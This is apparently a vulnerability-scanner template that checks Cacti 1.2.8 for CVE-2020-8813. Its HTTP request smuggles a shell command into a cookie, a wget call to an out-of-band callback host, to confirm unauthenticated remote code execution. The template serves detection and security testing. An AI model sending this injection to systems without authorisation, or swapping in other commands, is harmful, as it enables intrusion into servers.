32 lines
1.1 KiB
YAML
32 lines
1.1 KiB
YAML
id: CVE-2020-8813
|
|
|
|
info:
|
|
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
|
author: gy741
|
|
severity: high
|
|
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
|
reference:
|
|
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
|
- https://github.com/Cacti/cacti/releases
|
|
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
|
|
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2020-8813
|
|
cwe-id: CWE-78
|
|
tags: cve,cve2020,cacti,rce,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /graph_realtime.php?action=init HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|